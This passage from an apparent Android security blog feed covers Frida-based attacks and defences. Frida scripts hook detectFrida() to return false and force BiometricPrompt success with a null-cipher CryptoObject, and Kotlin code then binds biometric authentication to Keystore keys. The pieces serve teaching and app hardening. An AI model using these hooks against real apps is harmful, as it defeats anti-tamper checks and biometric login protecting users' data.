        val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
        val keyGenParameterSpec = KeyGenParameterSpec.Builder(
            keyAlias,
            KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
        ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
            .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
            .setUserAuthenticationRequired(true)
            .setInvalidatedByBiometricEnrollment(true)
            .setUserAuthenticationValidityDurationSeconds(-1)  // Require biometric every time
            .build()

        keyGenerator.init(keyGenParameterSpec)
        keyGenerator.generateKey()
    }

    // Initialize the cipher for encryption/decryption
    private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
        return try {
            keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
            keyStore.load(null)

            val key = keyStore.getKey(keyAlias, null) as SecretKey
            cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

            if (mode == Cipher.ENCRYPT_MODE) {
                cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
            } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
                val gcmSpec = GCMParameterSpec(128, iv)
                cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV
            }
            true
        } catch (e: Exception) {
            e.printStackTrace()
            false
        }
    }

    // Show biometric prompt and tie it to the cipher object
    private fun showBiometricPrompt() {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                    try {
                        val decryptedData = decryptData(cryptoObject)
                        if (decryptedData == null || !isValidData(decryptedData)) {
                            Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                        } else {
                            showSuccess()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Decryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                } else {
                    Toast.makeText(this@MainActivity, &quot;Authentication succeeded but CryptoObject is missing!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication&quot;)
                .setSubtitle(&quot;Log in using your fingerprint&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Updated: Fixing how cipher is used after biometric authentication completes
    private fun showBiometricPromptForEncryption(plainText: String) {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null) {
                    try {
                        // Encrypt after biometric authentication
                        val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                        if (encryptedData != null) {
                            val iv = cryptoObject.cipher?.iv  // Get the generated IV
                            storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                            Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                }
            }

            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.ENCRYPT_MODE)) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication for Encryption&quot;)
                .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Check if decrypted data is valid
    private fun isValidData(decryptedData: ByteArray): Boolean {
        return decryptedData.contentEquals(expectedData)  // Example validation
    }

    // Decrypt data using the CryptoObject
    private fun decryptData(cryptoObject: BiometricPrompt.CryptoObject): ByteArray? {
        return try {
            val encryptedData = Base64.decode(retrieveEncryptedData(), Base64.DEFAULT)
            val iv = retrieveStoredIV()  // Retrieve the stored IV
            if (initCipher(Cipher.DECRYPT_MODE, iv)) {  // Use the retrieved IV
                val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
                decryptedData
            } else {
                null
            }
        } catch (e: Exception) {
            e.printStackTrace()
            null
        }
    }

    private fun encryptAndStoreData(plainText: String) {
        if (initCipher(Cipher.ENCRYPT_MODE)) {
            try {
                val encryptedData = cipher.doFinal(plainText.toByteArray())
                val iv = cipher.iv  // Get the generated IV
                storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv)
            } catch (e: Exception) {
                e.printStackTrace()
                Toast.makeText(this, &quot;Encryption failed&quot;, Toast.LENGTH_SHORT).show()
            }
        }
    }

    // Simulate storing encrypted data and IV (replace with actual storage logic)
    private fun storeEncryptedDataAndIV(encryptedData: String, iv: ByteArray) {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.putString(&quot;encrypted_data&quot;, encryptedData)
        editor.putString(&quot;iv&quot;, Base64.encodeToString(iv, Base64.DEFAULT))  // Store the IV as Base64 string
        editor.apply()
    }

    // Retrieve encrypted data and IV
    private fun retrieveEncryptedData(): String {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        return sharedPreferences.getString(&quot;encrypted_data&quot;, &quot;&quot;) ?: &quot;&quot;
    }

    private fun retrieveStoredIV(): ByteArray {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val ivString = sharedPreferences.getString(&quot;iv&quot;, null)
        return Base64.decode(ivString, Base64.DEFAULT)
    }

    private fun showSuccess() {
        Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
        val intent = Intent(this, SuccessActivity::class.java)
        startActivity(intent)
        finish()  // Optionally finish MainActivity to prevent going back without re-authentication
    }
    private fun resetEncryptedData() {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.remove(&quot;encrypted_data&quot;)  // Remove encrypted data
        editor.remove(&quot;iv&quot;)  // Remove IV
        editor.apply()
        Log.d(&quot;Reset&quot;, &quot;Encrypted data and IV reset.&quot;)
        Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
    }

    // Show a message to the user when Frida is detected and close the app
    private fun showFridaDetectedDialog() {
        val builder = AlertDialog.Builder(this)
        builder.setTitle(&quot;Security Warning&quot;)
        builder.setMessage(&quot;Frida or another tampering tool has been detected. The app will now close for security reasons.&quot;)
        builder.setCancelable(false)
        builder.setPositiveButton(&quot;OK&quot;) { dialog: DialogInterface, _: Int -&gt;
            dialog.dismiss()
            closeApp()
        }
        val dialog: AlertDialog = builder.create()
        dialog.show()
    }

    // Method to close the app
    private fun closeApp() {
        Toast.makeText(this, &quot;Closing app...&quot;, Toast.LENGTH_SHORT).show()
        finishAffinity()  // Close the app completely
    }
}

```
&lt;/details&gt;


# Limitations and Evasion of Native Frida Detection

Although this native Frida detection is a useful technique to enhance security, it is relatively easy to bypass. Whether using Frida itself or through [reverse engineering with tools like **JADX**](https://www.kayssel.com/post/android-4/), attackers can effectively neutralize these detection mechanisms with minimal effort.

![](/content/images/2024/10/image-4.png)

Detection of the function to detect Frida

One of the simplest ways to bypass native detection mechanisms is to use Frida itself. By hooking into the app&apos;s runtime, you can modify the behavior of the detection function and force it to return a benign result. Here’s an example of how you can bypass the `detectFrida()` function using a Frida script:

```javascript
Java.perform(function() {
    // Hook a method in an Android app (replace the class and method names)
    var MainActivity = Java.use(&apos;com.example.localauth.MainActivity&apos;);

    // Intercept the method and modify its return value
    MainActivity.detectFrida.implementation = function() {
        console.log(&quot;Bypassing detectFrida method...&quot;);
        return false;  // Always return false to bypass Frida detection
    };
});

```

![](/content/images/2024/09/image-21.png)

Frida detection bypass

This script works by hooking into the `MainActivity` class and replacing the implementation of the `detectFrida()` function. Instead of executing the original detection logic, the script ensures that the function always returns `false`, indicating that no Frida processes are detected, effectively bypassing the security check.

-   `**Java.use(&apos;com.example.localauth.MainActivity&apos;)**`: Hooks into the `MainActivity` class, where the `detectFrida()` function is defined.
-   **Modifying the Function**: The original implementation of `detectFrida()` is replaced, and it now always returns `false`, preventing the app from detecting Frida.

This approach is particularly effective because Frida operates at the Java layer, making it easy to manipulate the execution of methods without needing to modify the underlying native code directly.

# Conclusions

In conclusion, using native libraries in Android applications can greatly improve security by making it harder to manipulate the app&apos;s runtime or bypass defenses. Since native code operates outside the managed Android environment, it provides a stronger layer of protection against tampering, reverse engineering, and dynamic analysis tools like Frida. This deeper level of integration helps reinforce existing security mechanisms, such as SSL pinning or root detection, by adding additional barriers that operate at the system level.

However, even with these protections in place, it’s important to understand that skilled adversaries can still find ways to bypass native defenses. Tools like Frida can be used to hook into the app and disable security checks, highlighting the need for a more comprehensive security approach that anticipates these potential bypasses.

In the next chapter, we’ll explore more advanced scenarios where circumventing protections becomes significantly more challenging. We’ll discuss techniques that make it difficult to rely on tools like Frida and may require deeper methods, such as reverse engineering the native library, to successfully overcome security measures. This will help uncover the strategies needed to navigate more complex security setups.</content:encoded><author>Ruben Santos</author></item><item><title>Securing Biometric Authentication: Defending Against Frida Bypass Attacks</title><link>https://www.kayssel.com/post/android-8</link><guid isPermaLink="true">https://www.kayssel.com/post/android-8</guid><description>This article explains how attackers use Frida to bypass biometric authentication and how to defend against it. By understanding the Android Keystore, CryptoObject, and encryption, we implement security measures to protect sensitive data and strengthen biometric authentication in Android apps.</description><pubDate>Sun, 29 Sep 2024 10:38:02 GMT</pubDate><content:encoded># Introduction

In the previous chapter, I focused on the basic concepts of local authentication and its vulnerabilities. In this chapter, I&apos;ll delve deeper into the system, explaining how attackers can bypass biometric authentication using Frida and, more importantly, how developers can secure their implementations against these types of attacks.

Here’s what I’ll cover:

-   **How the Bypass Works**: I’ll explain the mechanisms behind how attackers use Frida to bypass biometric authentication, altering key functions to simulate successful authentication.
-   **How the Android Keystore and CryptoObject Work**: A deep dive into the role of the Android Keystore and CryptoObject in securing biometric authentication and why they are critical for protecting sensitive operations.
-   **Implementing Changes to Our Insecure App**: I’ll walk through the steps to strengthen our previously insecure application by making necessary changes to improve biometric security.
-   **Testing the Changes**: Finally, I’ll demonstrate how to test these improvements and verify that the app is now more resilient to bypass attempts.

The goal of this chapter is to dive deep into the inner workings of Frida, understand how these attacks are carried out, and explore the necessary steps to defend against them. While Frida can be a powerful tool for attackers, with the right defense mechanisms, it’s possible to significantly reduce the risk of these bypass attempts.

# Bypassing Biometric Authentication with Frida: How it Works

[The Frida script](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js) is designed to bypass biometric authentication in Android applications by manipulating the flow of biometric prompts at runtime. Frida, a powerful dynamic instrumentation toolkit, allows attackers to hook into application methods and modify their behavior on the fly. In this case, the script overrides how biometric authentication operates, forcing the app to treat any authentication attempt as successful, even if no real biometric data is provided.

#### Hooking into Biometric Authentication Methods

The first step the script takes is hooking into Android&apos;s biometric authentication methods. The script supports different Android APIs, from the modern `BiometricPrompt.authenticate()` method introduced in Android 9 (API 28) to the older `FingerprintManager.authenticate()` for pre-Android 9 versions.

```javascript
var biometricPrompt = Java.use(&apos;android.hardware.biometrics.BiometricPrompt&apos;)[&apos;authenticate&apos;].overload(&apos;android.os.CancellationSignal&apos;, &apos;java.util.concurrent.Executor&apos;, &apos;android.hardware.biometrics.BiometricPrompt$AuthenticationCallback&apos;);
console.log(&quot;Hooking BiometricPrompt.authenticate()...&quot;);
biometricPrompt.implementation = function (cancellationSignal, executor, callback) {
    console.log(&quot;[BiometricPrompt.BiometricPrompt()]: Hooked!&quot;);
    var authenticationResultInst = getBiometricPromptAuthResult();
    callback.onAuthenticationSucceeded(authenticationResultInst); // Force success
}

```

In the code above, the script hooks into the `BiometricPrompt.authenticate()` method and replaces its implementation. Normally, this method would invoke biometric authentication and wait for user input (such as fingerprint recognition). However, the script intercepts the call and directly creates a fake authentication result. It then invokes the `onAuthenticationSucceeded()` callback, making the app believe that biometric authentication was successful.

#### Forcing `onAuthenticationSucceeded()`

The key part of this script is the forced invocation of `onAuthenticationSucceeded()`. This callback is designed to be triggered only after the user has successfully authenticated. However, the script manipulates it by passing in a fabricated `AuthenticationResult` object that simulates success. Here&apos;s how this is done:

```javascript
function getBiometricPromptAuthResult() {
    var sweet_cipher = null;  // Null cipher
    var cryptoObj = Java.use(&apos;android.hardware.biometrics.BiometricPrompt$CryptoObject&apos;);
    var cryptoInst = cryptoObj.$new(sweet_cipher);  // Create a CryptoObject with null cipher
    var authenticationResultObj = Java.use(&apos;android.hardware.biometrics.BiometricPrompt$AuthenticationResult&apos;);
    var authenticationResultInst = getAuthResult(authenticationResultObj, cryptoInst);
    return authenticationResultInst;
}

```

In this part of the script, a `CryptoObject` is created with a null cipher (`sweet_cipher = null`). The `CryptoObject` usually contains a valid `Cipher`, used to perform encryption or decryption. However, in this case, the cipher is set to null, which could allow the app to bypass cryptographic checks if it doesn&apos;t properly validate the `CryptoObject`. After creating this manipulated `CryptoObject`, the script wraps it in an `AuthenticationResult` object and passes it to the app, which accepts it as if it came from a valid authentication flow.

#### Handling Different Android API Versions

To maximize compatibility across different Android versions, the script handles various biometric APIs. It first attempts to hook into the `BiometricPrompt` API introduced in Android 9, but it also includes fallback mechanisms for older APIs, like `FingerprintManager`:

```javascript
try { hookBiometricPrompt_authenticate(); }
catch (error) { console.log(&quot;hookBiometricPrompt_authenticate not supported on this android version&quot;) }

try { hookFingerprintManagerCompat_authenticate(); }
catch (error) { console.log(&quot;hookFingerprintManagerCompat_authenticate failed&quot;); }


```

If the device uses an older version of Android, the script tries to hook into the `FingerprintManagerCompat` API, ensuring that the attack works on a broader range of devices. This adaptability is one of the script’s strengths, as it can bypass biometric authentication on both newer and older Android versions.

#### Why the Attack Works

The success of this attack depends largely on whether the application properly validates the `CryptoObject` and its associated `Cipher`. If the app simply checks whether `onAuthenticationSucceeded()` was called without further validation, the null cipher will bypass both biometric authentication and cryptographic protections. The app might proceed to decrypt sensitive data or grant access to protected areas based on this manipulated authentication flow.

Here’s an example of how to prevent this kind of attack by ensuring that the `CryptoObject` and its cipher are properly validated:

```kotlin
override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
    val cryptoObject = result.cryptoObject
    if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
        // Perform secure operations only if the cipher is valid
        val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
        // Process decrypted data
    } else {
        Toast.makeText(this, &quot;Invalid CryptoObject or Cipher!&quot;, Toast.LENGTH_SHORT).show()
    }
}

```

In the example above, we check if both the `CryptoObject` and its `Cipher` are non-null before performing any sensitive operations. This would prevent the Frida script from bypassing biometric authentication with a null cipher.

# Understanding the Keystore and CryptoObject in Android

Now that we&apos;ve explored how the Frida script works, it&apos;s time to take a closer look at two critical components: the Keystore and CryptoObject. These play a central role in securing local authentication and protecting sensitive data, so let&apos;s dive deeper into how they function and why they&apos;re essential.

## The Android Keystore System

The **Android Keystore** is a system designed to securely store cryptographic keys, ensuring that sensitive information is protected even if the app is compromised. Keys stored in the Keystore are hardware-backed (if the device supports it), which means that even with root access, extracting these keys directly is extremely difficult. This is crucial for protecting encryption keys, which in turn secure user data.

When generating a key in the Keystore, you can specify various security properties, such as requiring user authentication to use the key. This is done through methods like `setUserAuthenticationRequired(true)` and `setInvalidatedByBiometricEnrollment(true)`. These settings tie the key&apos;s usage to biometric authentication, ensuring that only the authenticated user can perform cryptographic operations like encryption and decryption.

By configuring the Keystore properly, you can ensure that:

-   Keys are protected from unauthorized access.
-   Keys are invalidated if the biometric enrollment changes, adding another layer of security.
-   Keys can only be used after successful biometric authentication, making them inaccessible without the user&apos;s consent.

#### The Role of the CryptoObject

The **CryptoObject** is a wrapper around cryptographic operations, such as encryption and decryption, and is tightly linked to the biometric authentication process. It works as the bridge between the Android biometric prompt and the cipher created using the Keystore key.

Here’s how the `CryptoObject` fits into the authentication flow:

1.  **Tied to the Cipher**: When you create a `CryptoObject`, it’s usually tied to a `Cipher` object that handles encryption and decryption. This means that cryptographic operations are locked behind biometric authentication.
2.  **Used in Biometric Authentication**: When the user triggers biometric authentication (such as fingerprint scanning), the system verifies the user and, upon successful authentication, returns the `CryptoObject`. At this point, the cipher is “unlocked” and ready to perform the required cryptographic operation.
3.  **Ensures Secure Data Handling**: By linking the `CryptoObject` to biometric authentication, sensitive data like session keys or tokens can be encrypted and decrypted only when the user successfully authenticates. Without this step, even if an attacker gains access to encrypted data, they cannot decrypt it without biometric authentication.

For example, in the case of encrypting and decrypting sensitive data, the `CryptoObject` ensures that the cipher used to handle the encryption or decryption cannot be accessed without the user&apos;s biometric credentials.

# Steps to Create Secure Local Authentication

Building on our understanding of the Keystore and CryptoObject, we can now focus on defending against the attack. To create secure local authentication in Android, several key elements must be implemented. Here&apos;s what you need to consider:

1.  **Generate the Keystore Key**: Use the Android Keystore API to create a cryptographic key with the following settings:
    -   `setUserAuthenticationRequired(true)`: Ensures that the key can only be used after biometric authentication.
    -   `setInvalidatedByBiometricEnrollment(true)`: Invalidates the key if the user enrolls a new biometric credential (such as a fingerprint).
    -   `setUserAuthenticationValidityDurationSeconds(-1)`: This forces the user to authenticate every time the key is used.
2.  **Initialize the Cipher Object**: Once the key is generated, initialize a `Cipher` object using the key from the Keystore. This cipher will handle the encryption and decryption operations.
3.  **Create the CryptoObject**: Use the `Cipher` object to create a `BiometricPrompt.CryptoObject`. This object ties the biometric authentication to cryptographic operations.
4.  **Handle Authentication Success**: Implement the `BiometricPrompt.AuthenticationCallback.onAuthenticationSucceeded()` method. In this callback, retrieve the `Cipher` object from the `CryptoObject` and **use it to decrypt critical data**, such as a session key or another symmetric key that will be used to access your application’s encrypted data.
5.  **Trigger Authentication**: Call the `BiometricPrompt.authenticate()` function, passing in the `CryptoObject` and the callback defined in the previous steps. This ensures that biometric authentication is required before any decryption occurs.

In a previous post, we used some of these functionalities to create local authentication for a simple application. The main improvement in this approach is the use of the Android Keystore and `CryptoObject` to securely tie biometric authentication to cryptographic processes, enhancing overall security.

# Understanding the Code: Biometric Authentication with Encryption in Android

Now that we have a solid understanding of the different components and a plan in place, it’s time to start implementing everything into our code. In the next section, we’ll see how the Android Keystore and CryptoObject work together with AES encryption to secure sensitive data, ensuring that only an authenticated user can access it. Let’s dive into the implementation.

We’ll walk through each part of the code, explaining the functions and how they contribute to the overall security of the application. The concepts we just explored—secure key storage in the Keystore and cryptographic operations with the `CryptoObject`—are implemented in this code to provide a robust local authentication mechanism.

Let’s dive into the code and see how it all works in practice.

#### `onCreate()` – The Entry Point

The `onCreate()` method is where the app starts when the user opens this activity. Here, we set up the layout and define what happens when the buttons are clicked. There are three main actions the user can trigger: encrypt data, authenticate with biometrics, or reset encrypted data.

```kotlin
override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    setContentView(R.layout.activity_main)

    createKey()

    val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
    btnEncrypt.setOnClickListener {
        showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
    }

    val btnReset: Button = findViewById(R.id.btn_reset)
    btnReset.setOnClickListener {
        resetEncryptedData()
    }

    val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
    btnAuthenticate.setOnClickListener {
        showBiometricPrompt()
    }
}


```

-   **`createKey()`**: This function is called right away to generate a cryptographic key in the Android Keystore, which is required for encryption and decryption.
-   **Button Click Listeners**: Each button is linked to a function that handles encrypting, authenticating, or resetting data. Clicking the Encrypt button triggers biometric authentication before encrypting the data, while the Authenticate button prompts the user to authenticate in order to decrypt the stored data.

#### `createKey()` – Generating a Secure Key

This function creates a secure key in the **Android Keystore**. The key is used for both encryption and decryption, and it’s configured with specific security settings, such as requiring biometric authentication every time it’s used.

```kotlin
private fun createKey() {
    val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
    val keyGenParameterSpec = KeyGenParameterSpec.Builder(
        keyAlias,
        KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
    ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
        .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
        .setUserAuthenticationRequired(true)
        .setInvalidatedByBiometricEnrollment(true)
        .setUserAuthenticationValidityDurationSeconds(-1)
        .build()

    keyGenerator.init(keyGenParameterSpec)
    keyGenerator.generateKey()
}

```

-   **`KeyProperties.KEY_ALGORITHM_AES`**: Specifies that the AES encryption algorithm will be used.
-   **`KeyGenParameterSpec`**: This defines the key&apos;s properties, like requiring biometric authentication and using the GCM block mode (which allows encryption without padding).
-   **`setUserAuthenticationRequired(true)`**: Ensures that the key can only be used if the user has authenticated via biometrics.

#### `initCipher()` – Preparing for Encryption or Decryption

The `initCipher()` function sets up the cryptographic cipher. A **cipher** is an algorithm that performs encryption or decryption, and in this case, it’s using AES with GCM mode. This function initializes the cipher depending on whether we want to encrypt or decrypt data.

```kotlin
private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
    return try {
        keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
        keyStore.load(null)

        val key = keyStore.getKey(keyAlias, null) as SecretKey
        cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

        if (mode == Cipher.ENCRYPT_MODE) {
            cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
        } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
            val gcmSpec = GCMParameterSpec(128, iv)
            cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV for decryption
        }
        true
    } catch (e: Exception) {
        e.printStackTrace()
        false
    }
}

```

-   **Encryption Mode**: If the mode is `ENCRYPT_MODE`, the cipher is initialized to encrypt data, and a new IV (initialization vector) is generated.
-   **Decryption Mode**: If the mode is `DECRYPT_MODE`, the cipher is initialized with the existing IV (retrieved from storage) to decrypt data. The IV is critical for successful decryption.

#### `showBiometricPromptForEncryption()` – Encrypting After Biometric Authentication

This function prompts the user to authenticate with biometrics before encrypting the data. After a successful authentication, the cipher is used to encrypt the provided plaintext data.

```kotlin
private fun showBiometricPromptForEncryption(plainText: String) {
    val executor = ContextCompat.getMainExecutor(this)
    val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
        override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
            val cryptoObject = result.cryptoObject
            if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                try {
                    val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                    if (encryptedData != null) {
                        val iv = cryptoObject.cipher?.iv
                        storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                        Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                    }
                } catch (e: Exception) {
                    e.printStackTrace()
                    Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
        }
    })

    if (initCipher(Cipher.ENCRYPT_MODE)) {
        val cryptoObject = BiometricPrompt.CryptoObject(cipher)
        val promptInfo = BiometricPrompt.PromptInfo.Builder()
            .setTitle(&quot;Biometric Authentication for Encryption&quot;)
            .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
            .setNegativeButtonText(&quot;Use password&quot;)
            .build()

        biometricPrompt.authenticate(promptInfo, cryptoObject)
    }
}

```

-   **Biometric Prompt**: The app displays a biometric authentication prompt. When the user successfully authenticates, the cipher is used to encrypt the plaintext (`&quot;PASSWORD&quot;`).
-   **Cipher Execution**: The `cipher.doFinal()` method encrypts the data and generates an encrypted byte array. This is then stored along with the IV (required for decryption).

#### `showBiometricPrompt()` – Decrypting After Biometric Authentication

This function works similarly to the encryption process but focuses on decryption. After the user authenticates, the cipher decrypts the stored data.

```kotlin
private fun showBiometricPrompt() {
    val executor = ContextCompat.getMainExecutor(this)
    val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
        override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
            val cryptoObject = result.cryptoObject
            if (cryptoObject != null) {
                val decryptedData = decryptData(cryptoObject)
                if (decryptedData != null &amp;&amp; isValidData(decryptedData)) {
                    showSuccess()
                } else {
                    Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
        }
    })

    if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
        val cryptoObject = BiometricPrompt.CryptoObject(cipher)
        val promptInfo = BiometricPrompt.PromptInfo.Builder()
            .setTitle(&quot;Biometric Authentication&quot;)
            .setSubtitle(&quot;Log in using your fingerprint&quot;)
            .setNegativeButtonText(&quot;Use password&quot;)
            .build()

        biometricPrompt.authenticate(promptInfo, cryptoObject)
    }
}


```

-   **Decrypting Data**: The cipher decrypts the previously encrypted data using the stored IV. The `isValidData()` function checks if the decrypted data matches the expected value (`&quot;PASSWORD&quot;`).

#### `resetEncryptedData()` – Clearing Stored Data

This function allows users to clear the encrypted data and IV from `SharedPreferences`. This is useful for resetting the app or logging out.

```kotlin
private fun resetEncryptedData() {
    val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
    val editor = sharedPreferences.edit()
    editor.remove(&quot;encrypted_data&quot;)
    editor.remove(&quot;iv&quot;)
    editor.apply()
    Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
}

```

&lt;details&gt;
&lt;summary&gt;All code&lt;/summary&gt;

```kotlin
package com.example.localauth

import android.content.Intent
import android.os.Bundle
import android.util.Base64
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import java.security.KeyStore
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.SecretKey
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import android.util.Log
import javax.crypto.spec.GCMParameterSpec

class MainActivity : AppCompatActivity() {

   private lateinit var cipher: Cipher
   private lateinit var keyStore: KeyStore
   private val keyAlias = &quot;test&quot;
   val expectedData = &quot;PASSWORD&quot;.toByteArray()

   override fun onCreate(savedInstanceState: Bundle?) {
       super.onCreate(savedInstanceState)
       setContentView(R.layout.activity_main)

       createKey()

       val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
       btnEncrypt.setOnClickListener {
           showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
       }

       val btnReset: Button = findViewById(R.id.btn_reset)
       btnReset.setOnClickListener {
           resetEncryptedData()
       }

       val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
       btnAuthenticate.setOnClickListener {
           showBiometricPrompt()
       }
   }

   // Create Key in Keystore
   private fun createKey() {
       val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
       val keyGenParameterSpec = KeyGenParameterSpec.Builder(
           keyAlias,
           KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
       ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
           .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
           .setUserAuthenticationRequired(true)
           .setInvalidatedByBiometricEnrollment(true)
           .setUserAuthenticationValidityDurationSeconds(-1)  // Require biometric every time
           .build()

       keyGenerator.init(keyGenParameterSpec)
       keyGenerator.generateKey()
   }

   // Initialize the cipher for encryption/decryption
   private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
       return try {
           keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
           keyStore.load(null)

           val key = keyStore.getKey(keyAlias, null) as SecretKey
           cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

           if (mode == Cipher.ENCRYPT_MODE) {
               cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
           } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
               val gcmSpec = GCMParameterSpec(128, iv)
